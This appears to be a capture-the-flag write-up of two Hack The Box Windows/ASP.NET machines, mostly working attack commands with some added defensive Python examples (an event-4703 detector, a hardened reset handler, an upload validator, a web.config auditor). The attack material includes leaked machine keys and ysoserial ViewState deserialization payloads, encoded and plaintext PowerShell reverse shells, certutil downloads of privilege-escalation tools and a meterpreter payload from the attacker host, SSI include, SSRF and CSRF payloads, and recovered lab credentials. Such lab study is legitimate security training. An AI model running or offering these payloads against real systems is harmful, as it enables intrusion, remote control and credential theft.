[TOC]
# LAB-1: Subdomain / Path Traversal -> Download web.config / Insecure Deserialization - ViewState ASP.NET / PowerShell credential cracking / runas.exe / SeDebugPrivilege abuse
https://app.hackthebox.com/machines/585
## Recon
```
ATTACKER_INTERFACE="tun3"
TARGET_IP=10.10.11.251
ATTACKER_IP=$(ip addr show $ATTACKER_INTERFACE | awk '/inet / {print $2}' | cut -d '/' -f 1)
```

```
TARGET_DOMAIN='pov.htb'
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```
## Enumerate Attack surfaces
### SubDomain
```
wfuzz -u http://$TARGET_IP -H "Host: FUZZ.$TARGET_DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw 834
```

```
echo "$TARGET_IP dev.$TARGET_DOMAIN" >> /etc/hosts
```

## Identify & Exploit Vulnerabilities
### ASP.NET __VIEWSTATE
__VIEWSTATE is a hidden field that carries page and control state across postbacks; it is serialized into the page when the HTML is rendered.


[Exploit - Reference](https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter?source=post_page-----7516c938c688--------------------------------#test-case-3-.net-less-than-4.5-and-enableviewstatemac-true-false-and-viewstateencryptionmode-true)
### Case
EnableViewStateMac = True/False (?)
ViewStateEncryptionMode = True
We need the machineKey to inject an object (gadget) chain that invokes system calls when the server deserializes it.
The machineKey is typically stored in web.config.
We need to find an endpoint with path traversal to steal web.config.
### Find out web.config
Fuzzing for sensitive files

```
ffuf -request-proto http -request reqm.txt -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -fs 168
```

```
default.aspx
Default.aspx
contact.aspx
Contact.aspx
cv.pdf
index.aspx.cs
Contact.aspx.cs
Index.aspx.cs
contact.aspx.cs
```
Testing /web.config

```
ffuf -request-proto http -request reqm1.txt -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -fs 168
```


Very lucky: the developer did not set a ViewStateUserKey!
Machine keys:
```
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
```
## Exploit (ysoserial.exe )
Basic .NET deserialization
Build the object (gadget) chain with ysoserial.exe
Modify:
- path
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://10.10.14.15:80/$env:UserName" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
```

Works.
### Base 64 powershell to RCE
Reverse PowerShell
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
```


## Privilege escalation to a normal user
Recovering the PowerShell credential stored for an automatic connection!
```
$EncryptedString = Get-Content .\pass.txt
$SecureString = ConvertTo-SecureString $EncryptedString
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString
echo $Credential.GetNetworkCredential().password
```
```
$username = 'alaading'
$password = 'f8gQ8fynP44ek1m3'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
# full type name: 'Automation.PSCredential' does not resolve in PowerShell
$credential = New-Object System.Management.Automation.PSCredential($username, $securePassword)
Invoke-Command -ComputerName localHost -Credential $credential -ScriptBlock{powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.15', 9000);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"}
```
Works.
### Runas.exe (local privilege to a normal user)
Download RunasCs (antivirus bypass)
```
certutil.exe -urlcache -split -f "http://10.10.14.15:80/RunasCs.exe" ".\RunasCs.exe"
```
```
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.15:53
```

## Privilege escalation to root


### Enable SeDebugPrivilege (psgetsys.ps1, EnableAllTokenPrivs.ps1)
```
certutil.exe -urlcache -split -f "http://10.10.14.15:80/psgetsys.ps1" ".\psgetsys.ps1"
certutil.exe -urlcache -split -f "http://10.10.14.15:80/EnableAllTokenPrivs.ps1" ".\EnableAllTokenPrivs.ps1"
```
Run the scripts in PowerShell:
```
.\psgetsys.ps1
.\EnableAllTokenPrivs.ps1
```

Upload a meterpreter shell to the target so we can migrate from cmd into an admin process!
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun3 LPORT=8988 -f exe > rev_mete_shell.exe
```
```
certutil.exe -urlcache -split -f "http://10.10.14.15:80/rev_mete_shell.exe" ".\rev_mete_shell.exe"
```
```
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.14.15 ; set LPORT 8988"
```
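Enabling SeDebugPrivilege on a token the way the two scripts above do is visible to the defender: with the "Token Right Adjusted" audit subcategory enabled, Windows writes Security event 4703 naming the process and the privileges it turned on. The detector below is an added example (not part of this writeup); its events are constructed and use simplified field names modelled on 4703, and the process allowlist is an assumption to tune per environment.

```python
"""Flag processes that enable SeDebugPrivilege (or similar) on their own token.

Added example, not from the original writeup. Events are constructed and
modelled loosely on Security event 4703 ("A user right was adjusted");
field names are simplified."""

SENSITIVE_PRIVILEGES = {"SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege"}

# Processes expected to enable SeDebugPrivilege during normal operation.
# Assumption for the example; a real allowlist is tuned per environment.
EXPECTED_PROCESSES = {
    r"C:\Windows\System32\services.exe",
    r"C:\Windows\System32\lsass.exe",
}

# Constructed sample events (not real log output).
SAMPLE_EVENTS = [
    {"EventID": 4703, "SubjectUserName": "svc_build",
     "ProcessName": r"C:\Windows\System32\svchost.exe",
     "EnabledPrivilegeList": "SeShutdownPrivilege"},
    {"EventID": 4703, "SubjectUserName": "alaading",
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege, SeLoadDriverPrivilege"},
    {"EventID": 4703, "SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Windows\System32\services.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege"},
    {"EventID": 4624, "SubjectUserName": "alaading",
     "ProcessName": "-", "EnabledPrivilegeList": "-"},
]


def parse_privilege_list(field):
    """Split the comma/newline separated privilege list of a 4703 event.
    A lone '-' means 'none' and yields an empty set."""
    parts = field.replace("\n", ",").split(",")
    return {p.strip() for p in parts if p.strip() and p.strip() != "-"}


def find_token_privilege_abuse(events):
    """One alert per 4703 event where a process outside the allowlist
    enabled at least one sensitive privilege."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4703:
            continue
        enabled = parse_privilege_list(ev.get("EnabledPrivilegeList", ""))
        hits = enabled & SENSITIVE_PRIVILEGES
        if not hits or ev.get("ProcessName") in EXPECTED_PROCESSES:
            continue
        alerts.append({
            "user": ev.get("SubjectUserName"),
            "process": ev.get("ProcessName"),
            "privileges": sorted(hits),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_token_privilege_abuse(SAMPLE_EVENTS):
        print(f"ALERT {alert['user']} enabled {', '.join(alert['privileges'])} in {alert['process']}")
```

Against the sample, only the PowerShell event fires: services.exe is allowlisted and the svchost event enabled nothing sensitive. The same rule works for the meterpreter migration that follows, since migrating into a SYSTEM process is normally preceded by exactly this kind of token adjustment from an interactive shell.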

# LAB-2: Password reset logic flaw / web.config leak via file upload (shtml) / SSRF - access to a sensitive decrypt endpoint / Deserialization - ViewState ASP.NET
https://app.hackthebox.com/machines/Perspective
## Recon
```
ATTACKER_INTERFACE="tun0"
TARGET_IP=10.10.11.151
ATTACKER_IP=$(ip addr show $ATTACKER_INTERFACE | awk '/inet / {print $2}' | cut -d '/' -f 1)
```


Domain Name -> http://perspective.htb/
```
TARGET_DOMAIN='perspective.htb'
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```
## Identify / Exploit vulnerabilities
Register an account

Forgot password

Support

-> Admin username
```
admin@perspective.htb
```
## Password reset logic flaw to admin
The website only validates the first step of the password reset.

When we try to reset the admin password, /Account/Forgot blocks the action
```
POST /Account/Forgot (admin is not allowed!)
POST /handlers/changePassword.ashx
```

The developer did not validate the emailhidder parameter
-> This lets an attacker specify an arbitrary user whose password gets reset
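The flaw is that the second step trusts a client-supplied identity instead of the one the first step approved. Below is an added example (not code from the Perspective box) showing that pattern beside the fix. The real handler's internals are not shown on the page, so step one is modelled here as issuing a single-use reset token (an assumption); step two is where the page says the emailhidder field went unchecked.

```python
"""Password-reset handler: the unchecked-identity pattern beside a fixed version.

Added example, not code from the Perspective box. Accounts, tokens and the
'emailhidder' form field are constructed to mirror the flow described above."""
import secrets


def new_state():
    """Constructed in-memory accounts and token table for the example."""
    users = {
        "admin@perspective.htb": {"password": "old-admin-pw", "role": "admin"},
        "meow@perspective.htb": {"password": "old-user-pw", "role": "user"},
    }
    tokens = {}  # reset token -> email the token was issued for
    return users, tokens


def request_reset(users, tokens, email):
    """Step one (/Account/Forgot on the page): refuse admin, otherwise issue a token."""
    account = users.get(email)
    if account is None or account["role"] == "admin":
        return None
    token = secrets.token_urlsafe(16)
    tokens[token] = email
    return token


def change_password_vulnerable(users, tokens, form):
    """Step two as described on the page: the token is checked for validity,
    but the account to modify comes from the client-supplied 'emailhidder'."""
    if form.get("token") not in tokens:
        return False
    target = form.get("emailhidder")
    if target not in users:
        return False
    users[target]["password"] = form["newPassword"]
    return True


def change_password_hardened(users, tokens, form):
    """Fixed: the account is the one the token was issued for. 'emailhidder'
    is ignored entirely, and the token is consumed so it cannot be replayed."""
    email = tokens.pop(form.get("token", ""), None)
    if email is None:
        return False
    users[email]["password"] = form["newPassword"]
    return True


if __name__ == "__main__":
    users, tokens = new_state()
    token = request_reset(users, tokens, "meow@perspective.htb")
    form = {"token": token, "emailhidder": "admin@perspective.htb", "newPassword": "Adminmeow@"}
    change_password_vulnerable(users, tokens, form)
    print("vulnerable handler changed admin password:",
          users["admin@perspective.htb"]["password"] == "Adminmeow@")
    users, tokens = new_state()
    form["token"] = request_reset(users, tokens, "meow@perspective.htb")
    change_password_hardened(users, tokens, form)
    print("hardened handler changed admin password:",
          users["admin@perspective.htb"]["password"] == "Adminmeow@")
```

The hardened version removes the hidden field from the trust decision altogether; any identity the browser sends in step two is at best redundant and at worst the thing the attacker controls.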

Reset the password
```
Adminmeow@
```
Query all user products




ViewState -> probably contains a deserialization vulnerability!
## File upload to steal sensitive files (shtml, shtm)
We need to steal web.config

### Upload bypass
- Content-Type
- Extension name / filename control?
- Magic bytes
- HTTP verb
Content-Type filter detected!

Extension name filter detected!

The extension check is a blacklist.

Attempt to upload a file that reads the sensitive file.
### Fuzzing for valid extensions
```
ffuf -request-proto http -request req -w /usr/share/seclists/Fuzzing/extensions-most-common.fuzz.txt
```


### shtm/shtml to include web.config
.shtm/.shtml -> server-side includes (HTML whose directives the server evaluates, so a file can be included dynamically and embedded in the page)
We can build a malicious .shtm/.shtml file that includes the sensitive file.
Attempt:
steal.config
```
<!--#include file="/web.config" -->
```
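The upload filter failed because it blacklisted extensions and trusted the Content-Type header, both of which the client controls. The validator below is an added example (not code from the Perspective box): it allowlists the final extension, rejects anything else in the name (so `x.shtml.png`-style names fail), treats Content-Type as a consistency check only, and requires the file's leading bytes to match. The allowlist and magic-byte table are assumptions for the example.

```python
"""Upload validation that an extension blacklist should have been.

Added example, not code from the Perspective box. Allowlist, magic bytes
and sample inputs are constructed for the example."""
import os
import re

# Allowed final extensions -> (leading bytes, expected Content-Type).
ALLOWED = {
    ".png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    ".jpg":  (b"\xff\xd8\xff", "image/jpeg"),
    ".jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    ".gif":  (b"GIF8", "image/gif"),
    ".pdf":  (b"%PDF-", "application/pdf"),
}

SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_upload(filename, content_type, data):
    """Return (accepted, reason). Accept only when the name, the declared
    Content-Type and the actual bytes all agree on one allowlisted type."""
    # strip any path component (handles both / and \ separators)
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)  # splitext returns only the LAST extension
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} is not in the allowlist"
    # 'x.shtml.png', 'x.shtml;.png' and similar fail here: the stem may contain
    # nothing but [A-Za-z0-9_-], so no inner extension survives to be parsed
    if not SAFE_STEM.fullmatch(stem):
        return False, "filename stem contains characters outside [A-Za-z0-9_-]"
    magic, expected_ct = ALLOWED[ext]
    # Content-Type is client-controlled, so it is a consistency check, not proof
    if content_type.split(";")[0].strip().lower() != expected_ct:
        return False, f"Content-Type {content_type!r} does not match {ext}"
    if not data.startswith(magic):
        return False, "file content does not match the declared type"
    return True, "ok"


if __name__ == "__main__":
    samples = [  # constructed uploads
        ("cv.pdf", "application/pdf", b"%PDF-1.7 constructed"),
        ("steal.shtml", "image/png", b'<!--#include file="/web.config" -->'),
        ("steal.shtml.png", "image/png", b"\x89PNG\r\n\x1a\n"),
    ]
    for name, ct, body in samples:
        print(name, validate_upload(name, ct, body))
```

Even with this check, store the file under a server-generated name in a directory with no script or SSI handler mapped, so an accepted file is never interpreted by the web server.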

Machine key obtained
Analysing web.config
```
<machineKey compatibilityMode="Framework20SP2" validation="SHA1" decryption="AES" validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" />
```
### ViewStateUserKey exists!
The website sets a ViewStateUserKey to protect against the deserialization attack
```
<appSettings>
<add key="environment" value="Production" />
<add key="Domain" value="perspective.htb" />
<add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />
<add key="SecurePasswordServiceUrl" value="http://localhost:8000" />
</appSettings>
```
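Both labs come down to the same handful of web.config settings: static keys in `<machineKey>`, the validation algorithm, `enableViewStateMac`, and whether a per-user ViewStateUserKey exists. The auditor below is an added example (not code from either box) that reads a constructed web.config modelled on the two quoted in this writeup (Lab 1: static keys and no ViewStateUserKey; Lab 2: static keys plus an `ENC1:` ViewStateUserKey in appSettings) and reports what a leaked copy would give an attacker. The key values are placeholders, and the appSettings lookup for ViewStateUserKey follows this application's convention rather than the framework's (normally `Page.ViewStateUserKey` is set in code).

```python
"""Audit an ASP.NET web.config for the settings that decide whether a leaked
machineKey becomes ViewState deserialization RCE.

Added example, not code from either box. The config below is constructed;
key values are placeholders."""
import xml.etree.ElementTree as ET

SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <appSettings>
    <add key="environment" value="Production" />
    <add key="ViewStateUserKey" value="ENC1:PLACEHOLDER==" />
  </appSettings>
  <system.web>
    <machineKey validation="SHA1" decryption="AES"
                validationKey="PLACEHOLDER_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Auto" />
  </system.web>
</configuration>
"""

# validation algorithms that predate the HMACSHA256+ recommendation
LEGACY_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}


def audit_viewstate_config(xml_text):
    """Return a list of (severity, message) tuples;
    severity is critical / high / low / info."""
    root = ET.fromstring(xml_text)
    findings = []

    mk = root.find("./system.web/machineKey")
    if mk is None:
        findings.append(("info", "no <machineKey>: keys are auto-generated and are not in web.config"))
    else:
        for attr in ("validationKey", "decryptionKey"):
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(("high", f"static {attr} in web.config: any file read "
                                         "(path traversal, SSI include) leaks it; rotate it after exposure"))
        validation = mk.get("validation")
        if validation is None:
            findings.append(("info", "validation not set: framework default applies "
                                     "(SHA1 before .NET 4.5, HMACSHA256 from 4.5)"))
        elif validation.upper() in LEGACY_VALIDATION:
            findings.append(("low", f"validation={validation}: prefer HMACSHA256 or stronger"))

    pages = root.find("./system.web/pages")
    mac = (pages.get("enableViewStateMac", "true") if pages is not None else "true").lower()
    if mac == "false":
        findings.append(("critical", "enableViewStateMac=false: __VIEWSTATE is accepted "
                                     "without a MAC, so anyone can supply serialized objects"))

    # This app's convention: a per-user ViewStateUserKey in appSettings
    # (normally Page.ViewStateUserKey is set in code; this lookup is box-specific).
    user_key = root.find("./appSettings/add[@key='ViewStateUserKey']")
    if user_key is None:
        findings.append(("high", "no ViewStateUserKey: a leaked machineKey alone "
                                 "is enough to forge a valid __VIEWSTATE"))
    elif user_key.get("value", "").startswith("ENC1:"):
        findings.append(("info", "ViewStateUserKey is stored encrypted; anything that can reach "
                                 "the decrypt service (e.g. via SSRF) can recover it"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_viewstate_config(SAMPLE_WEB_CONFIG):
        print(f"[{severity}] {message}")
```

Run against the sample it reports two `high` findings for the static keys and an `info` for the encrypted user key; strip the appSettings entry (the Lab 1 situation) and the missing ViewStateUserKey becomes a third `high`. The practical fix after a leak is the same in both labs: rotate the keys, because the MAC only protects ViewState while the key is secret.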

We have to find a way to decrypt "ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg=="
We also discover a sensitive internal port -> 8000
```
http://localhost:8000
```
## SSRF to access a sensitive API endpoint
SSRF to enumerate internal ports
Testing the filter
```
test<
```



The description field allows '<'
### Image tag attempt
```
<img src=http://10.10.14.15></img>
```

### meta tag attempt
Filter bypass
```
<meta http-equiv="refresh" content="0; url=http://10.10.14.15">
```


### SSRF exploit (API endpoint analysis)

```
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000">
```
The response comes back as XML (view the page source to read it)

Insert payloads to access the sensitive endpoints
```
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000/swagger/v1/swagger.json">
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000/encrypt">
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000/decrypt">
```


Reading the documentation
/swagger/v1/swagger.json


https://swagger.io/specification/
Using the endpoint via SSRF
To do this, we can make the server fetch our website and perform a CSRF-style request against the sensitive endpoint.
Goal
-> decrypt -> ViewStateUserKey
```
<add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />
```
`enc1:3UVxtz9jwPJWRvjdl1PfqXZTgg==`
### Passing the parameter via JavaScript (decrypt the ViewStateUserKey)
/encrypt?plaintext=meowhecker
```
<meta http-equiv="refresh" content="0; url=http://10.10.14.5/csrf1.html">
```
```html
<html>
<body>
<form action="http://127.0.0.1:8000/encrypt" method="GET">
<input type="hidden" name="plaintext" value="meowhecker" />
</form>
<script>
document.write("meow Paylod was triipped")
document.forms[0].submit();
</script>
</body>
</html>
```

Result for plaintext meowhecker:
```
enc1:42FytC514vVHbQ==
```
It looks like the ViewStateUserKey format
`<add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />`
/decrypt?cipherTextRaw
```
<meta http-equiv="refresh" content="0; url=http://10.10.14.5/csrf2.html">
```
Alternate payload
```
<html>
<body>
<form method="post" action="http://127.0.0.1:8000/decrypt?cipherTextRaw=enc1:vnx5pQ%3d%3d"></form>
<script>
document.write("meow Paylod was triipped")
document.forms[0].submit();
</script>
</body>
</html>
```


Key
```
SAltysAltYV1ewSTaT3
```
## RCE Via Deserialization

```
<machineKey compatibilityMode="Framework20SP2" validation="SHA1" decryption="AES" validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" />
```
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe Invoke-WebRequest -Uri http://10.10.14.5/$env:UserName" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.5" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```
Listener on the interface:
```
sudo tcpdump -ni tun0 icmp
```
RCE (Windows PowerShell)
### Reverse PowerShell (Base64)
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -e <base64 payload elided>" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```



https://github.com/itm4n/PrintSpoofer
http://10.10.14.5:80/PrintSpoofer64.exe
Download PrintSpoofer (bypass)
```
certutil.exe -urlcache -split -f "http://10.10.14.5:80/PrintSpoofer64.exe" ".\PrintSpoofer64.exe"
```